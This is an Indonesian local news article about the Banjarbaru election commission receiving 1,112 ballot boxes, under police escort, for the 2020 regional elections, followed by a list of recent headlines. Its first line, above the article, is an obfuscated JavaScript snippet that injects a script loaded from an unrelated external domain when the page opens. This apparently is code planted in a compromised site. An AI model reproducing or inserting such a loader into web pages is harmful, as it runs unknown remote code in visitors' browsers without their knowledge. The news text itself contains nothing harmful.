(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Pilkada Banjarbaru

KPU Banjarbaru Terima 1.112 Kotak Suara


KANALKALIMANTAN.COM, BANJARBARU – Komisi Pemilihan Umum (KPU) Kota Banjarbaru menerima kiriman logistik berupa kotak suara yang akan digunakan pada pelaksanaan Pilkada Serentak, 9 Desember mendatang.

Ketua KPU Banjarbaru Hegar Wahyu Hidayat mengungkapkan, kotak suara itu telah diterimanya pada Senin (2/11/2020) kemarin. Jumlah logistik yang diterima itu mencapai ribuan kotak suara.

“Kami telah menerima pengiriman logistik Pilkada Serentak tahun 2020 dengan jumlah kotak suara sebanyak 1.112 buah,” katanya.

Adapun ribuan kotak suara yang diterima itu terbagi untuk dipergunakan pada Pilwali Banjarbaru dan Pilgub Kalsel. Lebih rincinya, untuk Pemilihan Gubernur dan Wakil Gubernur Kalsel sebanyak 556 buah dan untuk Pilwali Banjarbaru sebanyak 556 buah.

 

Hegar mengungkapkan, pengiriman logistik ini dilakukan melalui jasa ekspedisi yang dikawal ketat oleh aparat kepolisian sejak dari Banjarmasin menuju Banjarbaru. Logistik ini merupakan pengiriman dari KPU Provinsi Kalimantan Selatan sejak 1 November kemarin melakukan pendistribusian ke kabupaten/kota penyelenggara Pilkada Serentak di Provinsi Kalimantan Selatan.

“Kotak suara yang sudah kita terima ini, langsung dimasukan ke dalam gudang penyimpanan. Dan sebelum dirakit, kotak surat akan dijaga ketat pihak TNI dan Polri,” terangnya.

Logistik tersebut diterima langsung Sekretaris KPU Kota Banjarbaru dengan didampingi oleh Komisioner KPU Kota Banjarbaru Mhd Wahyu NZ dan Romzi Fahmi, serta Kasubbag Umum, Jubaidi beserta staf disaksikan oleh Ketua Bawaslu Kota Banjarbaru dan Polres Banjarbaru. (kanalkalimantan.com/rico)

Reporter : Rico
Editor : Bie

Al Ghifari

Recent Posts

Pansus III DPRD Kotabaru Pelajari Tata Kelola Air Tangerang

KANALKALIMANTAN.COM, KOTABARU - Dalam rangka pembahasan Rancangan Peraturan Daerah (Raperda) tentang Pengelolaan Sumber Daya Air,… Read More

7 jam ago

Kuasa Hukum Keluarga Juwita Siap Tambah Barang Bukti dan Saksi

KANALKALIMANTAN.COM, BANJARBARU - Tim kuasa hukum keluarga Juwita berencana menambah barang bukti dan saksi tambahan… Read More

8 jam ago

Peringati Hari Malaria Sedunia, Ini Pesan Wabup Banjar

KANALKALIMANTAN.COM, MARTAPURA - Wakil Bupati Banjar Habib Idrus Al Habsyi membuka pertemuan koordinasi lintas sektor… Read More

9 jam ago

Tim Kuasa Hukum Keluarga Juwita Soroti Dua Pasal Dakwaan

KANALKALIMANTAN.COM, BANJARBARU - Advokasi Untuk Keadilan (AUK) Juwita mendampingi pihak keluarga menghadiri proses pelimpahan perkara… Read More

14 jam ago

Odmil III-15 Banjarmasin Limpahkan Kasus Juwita ke Pengadilan Militer

KANALKALIMANTAN.COM, BANJARBARU - Oditurat Militer (Odmil) III-15 Banjarmasin melimpahlan perkara kasus pembunuhan berencana yang dilakukan… Read More

17 jam ago

Disogok, Tiga Polisi Polres Samarinda ‘Bebaskan’ Tahanan Nyabu di Sel

KANALKALIMANTAN.COM, SAMARINDA – Tiga oknum polisi diduga membiarkan narkoba masuk ke ruang tahanan Mapolres Samarinda,… Read More

17 jam ago